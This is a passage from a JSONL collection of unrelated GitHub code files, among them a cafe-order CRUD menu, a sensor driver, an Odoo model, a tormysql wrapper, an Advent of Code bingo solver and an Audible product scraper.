\"s list \\n OR\")\n # print(\"Select 2 to create new \" + user_selection + \" \\n OR\")\n my_dict = {0:\"Return to the main menu\", \n 1: \"Print the \" + user_selection + \"s list\", \n 2: \"Create new \" + user_selection}\n headers = [\"Option\", \"Action\"]\n \n \n if user_selection != \"order\":\n \n # print(\"Select 3 to update an existing \" + user_selection + \" \\n OR\")\n # print(\"Select 4 to delete an existing \" + user_selection + \" \\n OR\")\n my_dict.update({3: \"Update an existing \" + user_selection})\n my_dict.update({4: \"Delete an existing \" + user_selection})\n while_range = 4\n \n else:\n \n # print(\"Select 3 to update an existing \" + user_selection + \" status\" + \" \\n OR\")\n # print(\"Select 4 to update an existing \" + user_selection + \" content\" + \" \\n OR\")\n # print(\"Select 5 to delete an existing \" + user_selection + \" \\n OR\")\n my_dict.update({3: \"Update an existing \" + user_selection})\n my_dict.update({4: \"Delete an existing \" + user_selection})\n while_range = 4\n \n print_dict_formatted(headers, my_dict)\n crud_option = get_input_ints(while_range)\n return crud_option\n\n\ndef get_main_menu_opts(main_option: int, prod_list: List[Dict], couriers_list: List[Dict], \n orders_dictlist: List[Dict], dump_json_sql, *sql_nosql_inputs):\n \n \n \"\"\"\n This has the main menu options. Note the recursive call.\n \n \"\"\"\n \n if main_option == 0:\n \n print(\"The application will now exit. 
Exiting application...\")\n time.sleep(2)\n exit()\n \n elif main_option == 1:\n \n return \"product\", \"price\", prod_list\n \n elif main_option == 2:\n \n return \"courier\", \"phone number\", couriers_list\n \n elif main_option == 3:\n \n return \"order\", orders_dictlist\n \n else:\n \n main_option = print('Input either 0 or 1 or 2 or 3 as advised above:')\n main_option = get_input_ints(3)\n get_main_menu_opts(main_option, prod_list, couriers_list, orders_dictlist)\n \n \ndef get_item_menu_opts(crud_option: int, item_opts_possible: Tuple, connect, main_menu_selection, \n sql_no_sql_create, sql_no_sql_update, sql_no_sql_delete, cafe_database, sql_no_sql_crt_order, price_summary_orders):\n \n \n \"\"\"\n This function has the CRUD operations. That is, either: \n \n 1) We read from the database and print outputs (Read)\n 2) We create soemthing new in the database (create either a product or courier or an order)\n 3) We update the database (either a product, courier or order)\n 4) We delete an objbect from the database (product, courier or an order)\n \n Notice the recursive call\n \n \"\"\"\n \n \n if crud_option == 0:\n \n user_option = get_main_menu()\n main_option = get_main_menu_opts(user_option)\n crud_option = get_item_menu(main_option)\n #get_item_menu_opts(crud_option, item_opts_possible, prod_list, courier_list, orders_dictlist, order_statuslist)\n get_item_menu_opts(crud_option, item_opts_possible, connect, main_menu_selection)\n \n elif crud_option == 1 and item_opts_possible[0] == \"order\": # reading from the database (sql or no sql)\n \n print(\"Getting your \" + item_opts_possible[0] + \" list....Hold on!\")\n time.sleep(2)\n print_items_formatted(item_opts_possible[-1])\n print_items_formatted(price_summary_orders)\n \n elif crud_option == 1:\n \n print(\"Getting your \" + item_opts_possible[0] + \" list....Hold on!\")\n time.sleep(2)\n print_items_formatted(item_opts_possible[-1])\n \n \n elif crud_option == 2 and item_opts_possible[0] == \"product\": # creating a new product in the database\n \n _ = create_product_courier(item_opts_possible, \"prod_name\", \"prod_price\", \"products\", connect, sql_no_sql_create)\n \n elif crud_option == 2 and item_opts_possible[0] == \"courier\": # creating a new courier in the database\n \n _ = create_product_courier(item_opts_possible, \"driver_name\", \"driver_phone\", \"couriers\", connect, sql_no_sql_create)\n \n elif crud_option == 3 and item_opts_possible[0] == \"product\": # updating the product database\n \n _ = create_product_courier(item_opts_possible, \"prod_name\", \"prod_price\", None, connect, sql_no_sql_create) \n _ = update_product(item_opts_possible[-1], my_dict, \"products\", connect, \"prod_id\", sql_no_sql_update)\n\n \n elif crud_option == 3 and item_opts_possible[0] == \"courier\": # updating the courier database\n \n my_dict = create_product_courier(item_opts_possible, \"driver_name\", \"driver_phone\", None, connect, sql_no_sql_create)\n _ = update_product(item_opts_possible[-1], my_dict, \"couriers\", connect, \"driver_id\", sql_no_sql_update)\n \n \n elif crud_option == 4 and item_opts_possible[0] != \"order\": # deleting from the database\n mapped_dict = {\"product\": \"prod_id\", \"courier\": \"driver_id\", }\n table_name = item_opts_possible[0] + \"s\"\n _ = delete_item(item_opts_possible[-1], sql_no_sql_delete, table_name, mapped_dict[item_opts_possible[0]], connect)\n prod_courier_table = read_from_db(get_item_query(table_name), connect)\n print(\"The updated table: \")\n print_items_formatted 
(prod_courier_table)\n \n elif crud_option == 4 and item_opts_possible[0] == \"order\": # deleting from the database\n table_name = item_opts_possible[0] + \"s\"\n _ = delete_item(item_opts_possible[-1], sql_no_sql_delete, table_name, \"order_id\", connect)\n user_output_orders = read_from_db(orders_result, connect)\n price_summary_orders = read_from_db(price_summary, connect)\n print_items_formatted(user_output_orders)\n print_items_formatted(price_summary_orders)\n \n \n elif crud_option == 2 and item_opts_possible[0] == \"order\": # creating a new order (one-to-many relationships here)\n \n create_order(item_opts_possible, cafe_database, sql_no_sql_crt_order, connect)\n \n elif crud_option == 3 and item_opts_possible[0] == \"order\": #updating order in the database\n \n print_items(item_opts_possible[-1])\n range_limit = len(item_opts_possible[-1]) - 1\n print(\"You will now have to enter the order number for which you want the status modified\\n\")\n print_items(item_opts_possible[-1])\n user_order_index = get_input_ints(range_limit)\n #range_limit = len(order_statuslist) - 1\n #print_items(order_statuslist)\n print(\"You will now have to enter the status index to which you want the order to be updated to\\n\")\n user_status_index = get_input_ints(range_limit)\n #item_opts_possible[-1][user_order_index]['status'] = order_statuslist[user_status_index]\n dump_json(item_opts_possible[-1], \"data/orders.json\")\n print(\"Appended order details:\\n\")\n print_items(item_opts_possible[-1])\n \n elif crud_option == 3 and item_opts_possible[0] == \"order\": #updating order in the database\n \n print_items(item_opts_possible[-1])\n range_limit = len(item_opts_possible[-1]) - 1\n print(\"You will now have to enter the index coresponding to the order you'd like updated\\n\")\n user_order_index = get_input_ints(range_limit)\n update_order(item_opts_possible[-1][user_order_index], cafe_database[0])\n \n \n else:\n product_option = print('Input index value within the range specified please:')\n product_option = get_input_ints(5)\n #get_item_menu_opts (product_option, prod_list)\n \n \ndef get_status_types():\n \n status_types = [\"Processing\", \"Accepted\", \"Preparing\", \"Ready\", \"Shipped\", \"Delivered\"]\n return status_types\n\n\ndef create_product_courier(item_opts_possible, key_1, key_2, table_name, connect, sql_no_sql_create):\n \n print_items_formatted (item_opts_possible[-1])\n inputted_list = create_item(\"Input: Name of the new \" + item_opts_possible[0] + \" please?\\n\", \\\n \"Input: \" + item_opts_possible[1].capitalize() + \" of the new \" + item_opts_possible[0] + \" please?\\n\")\n prod_name, prod_price = inputted_list\n my_dict = {key_1: prod_name, key_2: prod_price}\n if table_name is None: \n return my_dict\n sql_no_sql_create(my_dict, table_name, \"INSERT\", connect) #creating a prod or courier row in the sql /cafe database now\n prod_courier_table = read_from_db(get_item_query(table_name), connect)\n print(\"The appended list: \")\n print_items_formatted (prod_courier_table)\n return prod_courier_table\n\ndef delete_item(item_list: List, sql_no_sql_delete, table_name, id_name, connect):\n \n \"\"\"\n \n This function deletes a product from a list as defined by the user\n \n \"\"\"\n \n print_items_formatted(item_list) \n index = int(input('Input: Index Value to be deleted?'))\n while index > len(item_list):\n index = int(input('Input: Correct index value to be deleted, please?'))\n \n if (table_name is None):\n del item_list[index]\n return item_list\n 
sql_no_sql_delete(table_name, id_name, index, connect)\n return item_list\n\ndef create_order(item_opts_possible, cafe_database, process_order, connect):\n \n \n print_items_formatted(item_opts_possible[-1])\n inputted_list = create_item(\"Input: Please enter customer name\\n\", \n \"Input: Please enter customer address\\n\", \n \"Please enter customer phone number\\n\") \n \n customer_name, customer_address, customer_phone= inputted_list\n order_status = 'Preparing'\n customer_phone = validate_phone_number(customer_phone)\n order_items = []\n print(\"Menu of available drinks/food in the cafe\")\n print_items_formatted(cafe_database[0])\n prod_ids = create_prodids(cafe_database[0], order_items)\n my_dict = {\"customer_name\": customer_name, \"customer_address\": customer_address, \n \"customer_phone\": customer_phone, \"status\": order_status, \"items\": prod_ids}\n item_opts_possible[-1].append(my_dict)\n process_order(my_dict, connect)\n print(\"Appended order details:\\n\")\n user_output_orders = read_from_db(orders_result, connect)\n price_summary_orders = read_from_db(price_summary, connect)\n print_items_formatted(user_output_orders)\n print_items_formatted(price_summary_orders)","repo_name":"atanejajlr/week_5_v3","sub_path":"operations.py","file_name":"operations.py","file_ext":"py","file_size_in_byte":12827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73142864164","text":"import ustruct\nimport time\n\nclass AM2320:\n BUFFER_SIZE = const(8)\n\n def __init__(self, i2c=None, address=0x5c):\n self.i2c = i2c\n self.address = address\n self.buf = bytearray(self.BUFFER_SIZE)\n\n def measure(self):\n buf = self.buf\n address = self.address\n # wake sensor\n try:\n self.i2c.writeto(address, b'')\n except OSError:\n pass\n # read 4 registers starting at offset 0x00\n self.i2c.writeto(address, b'\\x03\\x00\\x04')\n # wait at least 1.5ms\n time.sleep_ms(2)\n # read data\n self.i2c.readfrom_mem_into(address, 0, buf)\n # print(buf)\n crc = ustruct.unpack('<H', bytearray(buf[-2:]))[0]\n if crc != self.crc16(buf[:-2]):\n raise Exception(\"checksum error\")\n\n def crc16(self, buf):\n crc = 0xFFFF\n for c in buf:\n crc ^= c\n for i in range(8):\n if crc & 0x01:\n crc >>= 1\n crc ^= 0xA001\n else:\n crc >>= 1\n return crc\n\n def humidity(self):\n return (self.buf[2] << 8 | self.buf[3]) * 0.1\n\n def temperature(self):\n t = ((self.buf[4] & 0x7f) << 8 | self.buf[5]) * 0.1\n if self.buf[4] & 0x80:\n t = -t\n return t\n","repo_name":"jcksnvllxr80/weather-station","sub_path":"am2320.py","file_name":"am2320.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"52"} +{"seq_id":"23889724511","text":"import csv\r\n\r\ndef prune_rows_without_hours(input_csv, output_csv='pruned.csv'):\r\n with open(input_csv, 'r') as infile, open(output_csv, 'w', newline='') as outfile:\r\n reader = csv.reader(infile)\r\n writer = csv.writer(outfile)\r\n\r\n # Write the header to the output CSV\r\n header = next(reader)\r\n writer.writerow(header)\r\n\r\n for row in reader:\r\n # Check if the row contains numeric values in columns representing hours\r\n if any(field.replace(',', '').replace('.', '').isdigit() for field in row[2:]):\r\n # Write the row to the output CSV\r\n writer.writerow(row)\r\n\r\n print(f\"Pruned CSV saved to {output_csv}\")\r\n\r\nif __name__ == \"__main__\":\r\n # Replace 'input.csv' with the path to your CSV file\r\n input_csv = './_table_1.csv'\r\n \r\n # Call the function with only the input CSV file, output_csv will default to 'pruned.csv'\r\n 
prune_rows_without_hours(input_csv)\r\n","repo_name":"Shiberal/pdf-table-calendar-to-ics","sub_path":"prune.py","file_name":"prune.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72805246565","text":"import logging\nfrom ..constant.constant import Constant\nfrom ..common.validation import Validation\nfrom odoo.exceptions import ValidationError, except_orm\nfrom odoo import models, fields, api, _\n\n_logger = logging.getLogger(__name__)\n\nRELATION = [\n ('husband', 'Husband'),\n ('wife', 'Wife'),\n ('daughter', 'Daughter'),\n ('son', 'Son'),\n ('brother', 'Brother'),\n ('sister', 'Sister'),\n ('mother', 'Mother'),\n ('father', 'Father'),\n ('other', 'Other'),\n]\n\n\n# Employee family information\nclass FamilyMember(models.Model):\n _name = 'family.member'\n _description = 'Family Member'\n\n @api.onchange('copy_address_from')\n def on_change_opy_address_from(self):\n for record in self:\n if record.copy_address_from == \"present_address\":\n record.home_street = record.employee_id.pre_street\n record.home_city = record.employee_id.pre_city\n record.home_landmark = record.employee_id.pre_landmark\n record.home_pcode = record.employee_id.pre_pcode\n record.home_state = record.employee_id.pre_state\n record.home_county = record.employee_id.pre_county\n elif record.copy_address_from == \"permanent_address\":\n record.home_street = record.employee_id.per_street\n record.home_city = record.employee_id.per_city\n record.home_landmark = record.employee_id.per_landmark\n record.home_pcode = record.employee_id.per_pcode\n record.home_state = record.employee_id.per_state\n record.home_county = record.employee_id.per_county\n\n @api.onchange('check_per_address')\n def on_change_check_per_address(self):\n for record in self:\n record.home_street = None\n record.home_city = None\n record.home_landmark = None\n record.home_pcode = None\n record.home_state = None\n record.home_county = None\n record.copy_address_from = None\n\n employee_id = fields.Many2one('hr.employee', 'Employee')\n name = fields.Char('Name', size=60) # , required=True\n birth_date = fields.Date('DOB')\n gender = fields.Selection([('male', 'Male'), ('female', 'Female')], 'Gender')\n blood_group = fields.Selection(\n [('o+', 'O+'), ('o-', 'O-'), ('a+', 'A+'), ('a-', 'A-'), ('b+', 'B+'), ('b-', 'B-'), ('ab+', 'AB+'),\n ('ab-', 'AB-')], 'Blood Group')\n relation = fields.Selection(RELATION, 'Relation') # , required=True\n profession = fields.Char('Profession')\n nationality = fields.Many2one('res.country', 'Nationality', default=lambda self: self.env.company.country_id)\n remarks = fields.Text('Remarks')\n check_per_address = fields.Boolean('Address Same As employee')\n copy_address_from = fields.Selection(\n [('present_address', 'Present Address'), ('permanent_address', 'Permanent Address')], 'Copy Address From')\n home_street = fields.Char('Street')\n home_landmark = fields.Char('Landmark')\n home_city = fields.Char('City', size=30)\n home_pcode = fields.Char('Pin Code', size=6, help=\"Max size is 6\") # , required=True\n home_state = fields.Many2one('res.country.state', 'State') # , required=True\n home_county = fields.Many2one('res.country', 'Country') # , required=True\n home_phone = fields.Char('Mobile Phone')\n\n # Constraints for validation\n @api.constrains('name', 'home_pcode', 'home_phone')\n def _check_constraints(self):\n for rec in self:\n if rec.name:\n flag = Validation.check_names(rec.name)\n if not flag:\n raise 
ValidationError(Constant.INVALID_MEMBER_NAME)\n if rec.home_pcode:\n flag = Validation.check_digit(rec.home_pcode)\n if not flag:\n raise ValidationError(Constant.INVALID_MEMBER_PINCODE)\n if rec.home_phone:\n flag = Validation.check_phone(rec.home_phone)\n if not flag:\n raise ValidationError(Constant.INVALID_MEMBER_PHONE)\n return True\n\n\nclass MemberRelation(models.Model):\n _name = 'member.relation'\n _description = 'Member Relation'\n _rec_name = 'rel_name'\n\n rel_name = fields.Char('Relation', size=30) # , required=True\n\n # Constraints for validation\n @api.constrains('rel_name')\n def _check_constraints(self):\n for rec in self:\n if rec.rel_name:\n flag = Validation.check_names(rec.rel_name)\n if not flag:\n raise ValidationError(Constant.INVALID_RELATION_NAME)\n","repo_name":"Aarika13/Odoo-hrms","sub_path":"aspire-erp-15/aspl_hr_employee/models/employee_family.py","file_name":"employee_family.py","file_ext":"py","file_size_in_byte":4629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"20821316826","text":"# coding: u8\n\nfrom __future__ import unicode_literals\n\nimport logging\n\nfrom tornado import ioloop, gen\nfrom tornado.util import ObjectDict\n\nimport tormysql\n\n\nclass Connection(object):\n def __init__(self,\n host, port, database,\n user=None, password=None,\n max_connections=50, # maximum number of connections open at the same time\n idle_seconds=3600, # close a connection after this many idle seconds (mysql defaults to 8 hours)\n wait_connection_timeout=10, # connection wait timeout (when the pool is full, wait for another connection to be released)\n charset='utf8',\n ):\n self.host = host\n self.port = port\n\n self.user = user\n self.password = password\n\n self.database = database\n\n self.max_connections = max_connections\n self.idle_seconds = idle_seconds\n self.wait_connection_timeout = wait_connection_timeout\n self.charset = charset\n\n self.pool = None\n ioloop.IOLoop(make_current=False).run_sync(self.reconnect)\n\n @gen.coroutine\n def __del__(self):\n yield self.close()\n\n @gen.coroutine\n def close(self):\n \"\"\"Closes this database connection.\"\"\"\n if self.pool is not None:\n yield self.pool.close()\n self.pool = None\n\n @gen.coroutine\n def reconnect(self):\n \"\"\"Closes the existing database connection and re-opens it.\"\"\"\n\n yield self.close()\n\n self.pool = tormysql.ConnectionPool(\n host=self.host,\n port=self.port,\n\n user=self.user,\n passwd=self.password,\n\n db=self.database,\n\n max_connections=self.max_connections,\n idle_seconds=self.idle_seconds,\n wait_connection_timeout=self.wait_connection_timeout,\n\n charset=self.charset,\n )\n\n @gen.coroutine\n def query(self, query, *args, **kwargs):\n \"\"\"Returns a row list for the given query and args.\"\"\"\n\n with (yield self.pool.Connection()) as conn:\n try:\n with conn.cursor() as cursor:\n yield self._execute(cursor, query, args, kwargs)\n except:\n yield conn.rollback()\n else:\n yield conn.commit()\n\n column_names = [d[0] for d in cursor.description]\n datas = [ObjectDict(zip(column_names, row)) for row in cursor]\n raise gen.Return(datas)\n\n @gen.coroutine\n def get(self, query, *args, **kwargs):\n \"\"\"Returns the (singular) row returned by the given query.\n\n If the query has no results, returns None. 
If it has\n more than one result, raises an exception.\n \"\"\"\n\n rows = yield self.query(query, *args, **kwargs)\n if not rows:\n raise gen.Return(None)\n elif len(rows) > 1:\n raise Exception(\"Multiple rows returned by function get()\")\n else:\n raise gen.Return(rows[0])\n\n # rowcount is a more reasonable default return value than lastrowid,\n # but for historical compatibility execute() must return lastrowid.\n @gen.coroutine\n def execute(self, query, *args, **kwargs):\n \"\"\"Executes the given query, returning the lastrowid from the query.\"\"\"\n\n return self.execute_lastrowid(query, *args, **kwargs)\n\n @gen.coroutine\n def execute_lastrowid(self, query, *args, **kwargs):\n \"\"\"Executes the given query, returning the lastrowid from the query.\"\"\"\n\n with (yield self.pool.Connection()) as conn:\n try:\n with conn.cursor() as cursor:\n yield self._execute(cursor, query, args, kwargs)\n except:\n yield conn.rollback()\n else:\n yield conn.commit()\n raise gen.Return(cursor.lastrowid)\n\n @gen.coroutine\n def execute_rowcount(self, query, *args, **kwargs):\n \"\"\"Executes the given query, returning the rowcount from the query.\"\"\"\n\n with (yield self.pool.Connection()) as conn:\n try:\n with conn.cursor() as cursor:\n yield self._execute(cursor, query, args, kwargs)\n except:\n yield conn.rollback()\n else:\n yield conn.commit()\n raise gen.Return(cursor.rowcount)\n\n @gen.coroutine\n def executemany(self, query, args):\n \"\"\"Executes the given query against all the given param sequences.\n\n We return the lastrowid from the query.\n \"\"\"\n return self.executemany_lastrowid(query, args)\n\n @gen.coroutine\n def executemany_lastrowid(self, query, args):\n \"\"\"Executes the given query against all the given param sequences.\n\n We return the lastrowid from the query.\n \"\"\"\n\n with (yield self.pool.Connection()) as conn:\n try:\n with conn.cursor() as cursor:\n yield cursor.executemany(query, args)\n except:\n yield conn.rollback()\n else:\n yield conn.commit()\n raise gen.Return(cursor.lastrowid)\n\n @gen.coroutine\n def executemany_rowcount(self, query, args):\n \"\"\"Executes the given query against all the given param sequences.\n\n We return the rowcount from the query.\n \"\"\"\n\n with (yield self.pool.Connection()) as conn:\n try:\n with conn.cursor() as cursor:\n yield cursor.executemany(query, args)\n except:\n yield conn.rollback()\n else:\n yield conn.commit()\n raise gen.Return(cursor.rowcount)\n\n update = delete = execute_rowcount\n updatemany = executemany_rowcount\n\n insert = execute_lastrowid\n insertmany = executemany_lastrowid\n\n @gen.coroutine\n def _execute(self, cursor, query, args, kwargs):\n try:\n yield cursor.execute(query, kwargs or args)\n except:\n logging.error(\"Error connecting to MySQL on %s\", self.host)\n self.close()\n raise\n","repo_name":"Shu-Ji/tormysql-torndb","sub_path":"tormysql_torndb.py","file_name":"tormysql_torndb.py","file_ext":"py","file_size_in_byte":6042,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"32708954158","text":"from api_models.event_comment import EventCommentCreate\nfrom db import crud\nfrom db.tests import factory\n\n\ndef test_create(db):\n event = factory.event.create_or_read(name=\"test\", db=db)\n obj = crud.event_comment.create_or_read(\n model=EventCommentCreate(event_uuid=event.uuid, username=\"analyst\", value=\"test\"), db=db\n )\n\n assert obj.value == \"test\"\n\n\ndef test_create_duplicate_value(db):\n event = 
factory.event.create_or_read(name=\"test\", db=db)\n obj1 = crud.event_comment.create_or_read(\n model=EventCommentCreate(event_uuid=event.uuid, username=\"analyst\", value=\"test\"), db=db\n )\n assert obj1\n\n # Ensure that you get the same object back if you try to create a duplicate value\n obj2 = crud.event_comment.create_or_read(\n model=EventCommentCreate(event_uuid=event.uuid, username=\"analyst\", value=obj1.value), db=db\n )\n assert obj2.uuid == obj1.uuid\n assert obj2.value == obj1.value\n","repo_name":"seanmcfeely/ace2-ams","sub_path":"db/app/db/tests/test_crud/event_comment/test_create.py","file_name":"test_create.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9386697110","text":"import sys\nsys.stdin = open('input.txt')\n\ninput = sys.stdin.readline\nN = int(input())\nbar = [int(input()) for _ in range(N)]\ncount = 0\ncheck = 0\nfor height in reversed(bar):\n if height > check:\n check = height\n count += 1\nprint(count)\n","repo_name":"skysky44/TIL","sub_path":"03_Algorithm/day12/실습/17608.py","file_name":"17608.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"44293336756","text":"from fasttext_sim import *\n\nimport math\nimport random\n\ndef calculate_online_accuracy():\n\ttest_size = math.ceil(len(texts)*0.20)\n\ttest_ids = random.sample(range(0, len(texts)), test_size)\n\n\ttexts_train = {}\n\ttexts_test = {}\n\n\tfor k, v in enumerate(texts.keys()):\n\t\tcopy = {\n\t\t\t\"vector\": texts[v][\"vector\"],\n\t\t\t\"text\": texts[v][\"text\"],\n\t\t\t\"skill\": texts[v][\"skill\"]\n\t\t}\n\t\tif k in test_ids:\n\t\t\tcopy[\"distance\"] = texts[v][\"distance\"]\n\t\t\ttexts_test[v] = copy\n\t\telse:\n\t\t\ttexts_train[v] = copy\n\n\tonline_accuracy_base = []\n\tfor i in range(len(ffms)):\n\t\ta = 0\n\t\tfor k, v in texts_test.items():\n\t\t\tdistances = OrderedDict(sorted(v[\"distance\"].items(), key=lambda item: item[0]))\n\t\t\tmatches = [m[\"match\"] for m in [v for v in distances.values()]]\n\t\t\ta += np.sum(matches[0:(i+1)])\n\t\tonline_accuracy_base.append(a / len(texts_test))\n\n\t[texts_test[d].pop(\"distance\", None) for d in texts_test] # small cleanup\n\n\tfor k in texts_test:\n\t\ttexts_test[k][\"distances\"] = []\n\n\t\tfor kk in ffms:\n\t\t\ttexts_test[k][\"distances\"].append([cosine_distance(texts_test[k][\"vector\"], ffms[kk][\"vector\"]), kk])\t\n\n\t\tfor kk in texts_train:\n\t\t\ttexts_test[k][\"distances\"].append([cosine_distance(texts_test[k][\"vector\"], texts_train[kk][\"vector\"]), texts_train[kk][\"skill\"]])\n\n\t\tseen = {}\n\t\tresult = []\n\t\tdistances = OrderedDict(sorted(texts_test[k][\"distances\"], key=lambda item: item[0]))\n\t\tfor i, pair in enumerate(distances.items()):\n\t\t\tif pair[1] not in seen:\n\t\t\t\tresult.append(pair)\n\t\t\t\tseen[pair[1]] = True\n\n\t\ttexts_test[k][\"distances\"] = []\n\t\tfor r in result:\n\t\t\tif r[1] == texts_test[k][\"skill\"]:\n\t\t\t\ttexts_test[k][\"distances\"].append([r[0], r[1], True])\n\t\t\telse:\n\t\t\t\ttexts_test[k][\"distances\"].append([r[0], r[1], False])\n\n\tonline_accuracy_final = []\n\tfor i in range(len(ffms)):\n\t\ta = 0\n\n\t\tfor k in texts_test:\n\t\t\tmatches = [m[2] for m in [v for v in texts_test[k][\"distances\"]]]\n\t\t\ta += np.sum(matches[0:(i+1)])\n\t\t\t\n\t\tonline_accuracy_final.append(a / len(texts_test))\n\n\treturn [online_accuracy_final, 
online_accuracy_base]\n\naccomulator = []\nfor i in range(1000):\n\taccomulator.append(calculate_online_accuracy()[0])\n\tprint(\"i is\", i)\n\nresult = np.zeros(len(ffms))\nfor key in accomulator:\n\tfor i, aac in enumerate(key):\n\t\tresult[i] = result[i] + aac\nresult = result/1000.0\n\ndef online_accuracy_plot():\n\tplt.title(\"Accuracy of fastText semi-supervised, online model\")\n\tplt.plot(range(1, len(ffms) + 1), online_accuracy_base)\n\tplt.plot(range(1, len(ffms) + 1), online_accuracy_final)\n\tplt.legend(['Base (offline) accuracy', 'Online accuracy'], loc='upper left')\n\tplt.grid()\n\tplt.xlabel((\"In top X\"))\n\tplt.ylabel((\"Accuracy\"))\n\tplt.show(block=False)\n\tinput(\"Hit Enter To Close\")\n\tplt.close()\n","repo_name":"eugene/gyldendal","sub_path":"online_fasttext_sim.py","file_name":"online_fasttext_sim.py","file_ext":"py","file_size_in_byte":2666,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"4978209525","text":"from pathlib import Path\n\nimport pandas\nfrom collections import OrderedDict\n\n\nclass BingoSubsystem:\n\n def __init__(self):\n with open(Path(__file__).parent / 'input.txt', 'r') as f:\n raw_input = f.read().split('\\n')[:-1]\n self.numbers = [int(num) for num in raw_input[0].split(',')]\n self.boards = [\n pandas.concat([\n pandas.DataFrame(data=[int(num) for num in row.split(' ') if num != '']).T\n for row in raw_input[i + 1:i + 6]\n ]).reset_index(drop=True)\n for i, row in enumerate(raw_input) if row == ''\n ]\n self.marks = [\n pandas.DataFrame({i: [False, False, False, False, False] for i in range(0, 5)})\n for _ in range(0, len(self.boards))\n ]\n\n def play(self):\n wins = OrderedDict()\n for num in self.numbers:\n for i, board in enumerate(self.boards):\n self.marks[i] = self.marks[i] + board.isin([num])\n if i not in wins and (self.marks[i].all().any() or self.marks[i].all(axis='columns').any()):\n wins[i] = self.calc_score(num, board, self.marks[i])\n return wins.popitem(last=False)[1], wins.popitem()[1]\n\n @staticmethod\n def calc_score(num, board, marks):\n unmarked_sum = board.mask(marks).sum().sum()\n return int(unmarked_sum * num)\n\n\nif __name__ == '__main__':\n bs = BingoSubsystem()\n solution_1, solution_2 = bs.play()\n print(f'Solution 1 = {solution_1}')\n print(f'Solution 2 = {solution_2}')\n assert solution_1 == 25410\n assert solution_2 == 2730\n","repo_name":"zachflanders/advent-of-code-2021","sub_path":"solutions/day_4/day_4.py","file_name":"day_4.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32123806349","text":"# Yêu cầu:\n# 1. nhập vào số bác sĩ\n# 2. nhập vào số y tá\n# 3. 
tính số nhóm cực đại có thể chia\n\na = int(input(\"Nhap vao so bac si: \"))\n\nb = int(input(\"Nhap vao so y ta: \"))\n\nwhile a != b:\n if a > b:\n a = a - b\n\n elif a < b:\n b = b - a\n \n# lặp đến lúc a và b bằng nhau thì thôi\n# chắc chắn sẽ có lúc bằng nhau\n# nếu bằng nhau thì dừng vòng lặp while\nn = a\n\nprint(f\"So nhom chia duoc la: {n}\")","repo_name":"conggaro/Hoc_Python","sub_path":"code python/Tuần 5 Câu lệnh lặp/Tìm ước chung lớn nhất/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"22040387172","text":"import json\nimport re\nimport scrapy\nfrom urllib.parse import urljoin\n\nRAW_PRODUCT_IDS = \"\"\"B004EVK3HG\n,B004FJHGE0\n,B004HJBZV8\n,B004S7OIOU\n,B004ZGYFQA\n,B0064DYOUE\n,B007KBKVEW\n,B007W5BSX4\n,B004ELYQIS\n,B004EXITL6\n\"\"\"\n\n\nclass AudibleCoUkProductSpider(scrapy.Spider):\n name = 'audible_co_uk_product'\n allowed_domains = ['www.audible.co.uk']\n start_urls = ['https://httpbin.org/ip']\n\n def parse(self, response): # NOQA\n product_ids = RAW_PRODUCT_IDS.split(',')\n for product_id in product_ids:\n split_id = product_id.strip()\n item_url = urljoin('https://www.audible.co.uk/pd/', split_id)\n yield scrapy.Request(url=item_url, callback=self.parse_product)\n\n def parse_product(self, response):\n audiobook_data, product_data = None, None\n for script in response.xpath('//div[@id=\\'bottom-0\\']/script'):\n if script.xpath(\"./self::*[contains(text(),\"\n \"'\\\"@type\\\": \\\"Audiobook\\\"')]/text()\"):\n audiobook_data = json.loads(script.xpath(\"./text()\").get())[0]\n elif script.xpath(\"./self::*[contains(text(),\"\n \"'\\\"@type\\\": \\\"Product\\\"')]/text()\"):\n product_data = json.loads(script.xpath(\"./text()\").get())[0]\n if not audiobook_data or not product_data:\n self.logger.error(f'No script data found for {response.url}')\n return\n\n item = {\n \"url\": response.url,\n 'title_name': audiobook_data.get('name', ''),\n 'no_reviews': audiobook_data.get('aggregateRating'\n '', {}).get('ratingCount', 0)\n }\n\n if audiobook_data.get('publisher'):\n item['publisher'] = audiobook_data['publisher']\n if audiobook_data.get('inLanguage'):\n item['lang'] = audiobook_data['inLanguage']\n if audiobook_data.get('datePublished'):\n item['publication_date'] = audiobook_data['datePublished']\n if audiobook_data.get('datePublished'):\n item['publication_date'] = audiobook_data['datePublished']\n if audiobook_data.get('aggregateRating', {}).get('ratingValue'):\n item['avg_review_score'] = audiobook_data['aggregateRating'\n '']['ratingValue'][:4]\n if audiobook_data.get('offers').get('highPrice'):\n item['buy_price'] = audiobook_data['offers']['highPrice']\n if product_data.get('productID'):\n item['asin'] = product_data['productID']\n if product_data.get('sku'):\n item['sku'] = product_data['sku']\n\n authors = []\n if audiobook_data.get('author'):\n for author in audiobook_data.get('author', []):\n authors.append(author['name'])\n item['authors'] = authors\n\n narrators = []\n if audiobook_data.get('readBy'):\n for narrator in audiobook_data.get('readBy', []):\n narrators.append(narrator['name'])\n item['narrators'] = narrators\n\n item_duration = audiobook_data.get('duration')\n if item_duration:\n t_minute = re.findall(r'(\\d+)M', item_duration)\n t_hour = re.findall(r'(\\d+)H', item_duration)\n if t_hour and t_minute:\n hour = t_hour[0]\n minute = t_minute[0]\n item['duration'] = f'{hour}:{minute}'\n elif t_hour:\n hour = 
